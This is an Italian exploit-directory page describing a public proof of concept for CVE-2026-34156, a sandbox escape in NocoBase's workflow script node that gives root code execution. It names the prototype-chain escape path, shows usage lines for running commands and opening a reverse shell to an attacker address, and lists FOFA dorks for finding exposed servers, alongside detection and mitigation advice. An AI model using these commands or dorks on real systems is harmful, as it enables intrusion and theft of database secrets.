Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-34156
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2026-34156 - Evasione Critica dalla Sandbox in NocoBase

ChatGPT Image Apr 3, 2026, 01_32_16 PM Critical CVSS 9.9 Exploit Public

Da non autenticato / privilegi bassi → Esecuzione Remota di Codice come root in NocoBase


📌 Panoramica

CVE-2026-34156 è una vulnerabilità critica di evasione dalla sandbox in NocoBase (una piattaforma open-source no-code/low-code).

Un attaccante in grado di creare o eseguire un Workflow Script Node (anche con privilegi limitati) può evadere dalla sandbox vm di Node.js e ottenere piena Esecuzione Remota di Codice come root all'interno del container.

Versioni Interessate

  • NocoBase < 2.0.28

Risolta In

  • NocoBase 2.0.28 (rilasciata a marzo 2026)
Scarica lo strumento

🛠 Dettagli della Vulnerabilità

  • Componente: @nocobase/plugin-workflow-javascript (Script Node)
  • Tipo: Evasione dalla sandbox tramite console._stdout.constructor.constructor
  • Impatto:
    • Esecuzione Remota di Codice come root (uid=0)
    • Esecuzione arbitraria di comandi
    • Accesso al file system (fs)
    • Perdita di variabili d'ambiente (credenziali del database, segreti)
    • Compromissione totale del container

Causa Principale

L'oggetto console passato nella sandbox proviene dal realm host, consentendo agli attaccanti di risalire la catena dei prototipi e accedere al vero costruttore Function → process.mainModule.require.


🚀 Exploit

Prova di Concetto (PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

Il repository include: script PoC completo, template Nuclei e checker sicuro.


🧪 Rilevamento

Template Nuclei

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

Dork FOFA

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ Mitigazione

  1. Aggiorna immediatamente a NocoBase 2.0.28 o versioni successive.
  2. Disabilita il Workflow Script Node per gli utenti non fidati.
  3. Esegui i container NocoBase come utente non-root.
  4. Utilizza un sandboxing più robusto (es. isolated-vm) in produzione.

📸 Screenshot

cve-2026-34156

⚠️ Disclaimer Legale

Questo repository è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza autorizzata.
Usalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione scritta a effettuare test.

Lo sfruttamento non autorizzato è illegale.


⭐ Crediti e Riferimenti

  • Scoperta: Sconosciuta (divulgata pubblicamente)
  • Patch: NocoBase Security Team
  • NVD: CVE-2026-34156
  • Advisory GitHub: GHSA-px3p-vgh9-m57c

Fatto con ❤️ per la community di sicurezza
Resta al sicuro. Applica le patch subito.